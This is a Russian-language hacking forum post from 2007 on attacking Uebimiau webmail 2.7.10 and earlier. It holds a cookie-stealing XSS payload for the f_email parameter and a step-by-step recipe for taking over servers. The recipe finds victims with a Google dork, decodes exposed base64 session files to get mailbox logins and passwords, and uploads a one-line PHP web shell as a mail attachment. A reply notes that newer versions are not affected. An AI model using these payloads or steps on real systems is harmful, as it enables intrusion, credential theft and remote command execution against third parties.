Пассивная XSS в Uebimiau V2.7.10 и более ранних версиях
Самая простецкая пассивная XSS в параметре $f_email сценария index.php. Уязвимость существует из-за отсутсвия фильтрации указанного выше параметра:
index.php:
Пример:
http://old.antichat.ru/webmail/index.php
POST: f_email="><script>alert(document.cookie)</script> (да простят меня вышестоящие =))
P. S. Версию можно узнать из файла
http://site.com/mail/docs/CHANGELOG.txt
Нашел также раскрытие пути в этом же параметре, когда несколько раз менял значение фунции alert(). Почему работает пока не разобрался, но кажется что-то из-за значения поля Referer.
Сразу подмечу, что не все системы уязвимы ... всё зависит от администратора сервера, ну и, конечно же, от настройки скрипта.
Способ получение шелла:
1. Идём в Google и пишем: allintitle: UebiMiau
2. Нашёл жертву: http://webmail.victom.com/mail/
3. Пишем:
Код:
http://webmail.victim.com/mail/database/_sessions
4. Если он эту папку откроет, то там наверни, будет файл с длинны названием
{40DD724C8FE70-40DD724C8FE84-1088254540}.usf , открываем его там будет
закодирован в текст в base64
5. декодируем base64
6. Когда разкодируем, получим сессию скрипта:
Как видна, мы получили логин и пароль от мэйла..
Логин: info
Пароль: abc123
7. Заходим на майл жертвы http://webmail.victom.com/mail/
- создаём новоё письмо (Write E-Mail), и добавляем файл: (Attach new file)
- зарания создаём файл shell.php с содержимым <? passthru($_GET['cmd]);?>
8. Когда добавили файл, болше нечего не надо делать (в смысле не надо заполнять остальные окна и не надо жать не каких кнопок.)
9. Проста, открываем новоё окно browsera, и пишем
Да, все это так. Только:
1) На последних версиях это не работает;
2) Индексация директорий, необходимая для атаки - тоже не самая частая вещь =(;
2) Умные админы (например, на g6 - так) вообще 301 ставят на эту директорию.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 01.09.2007 в 20:56..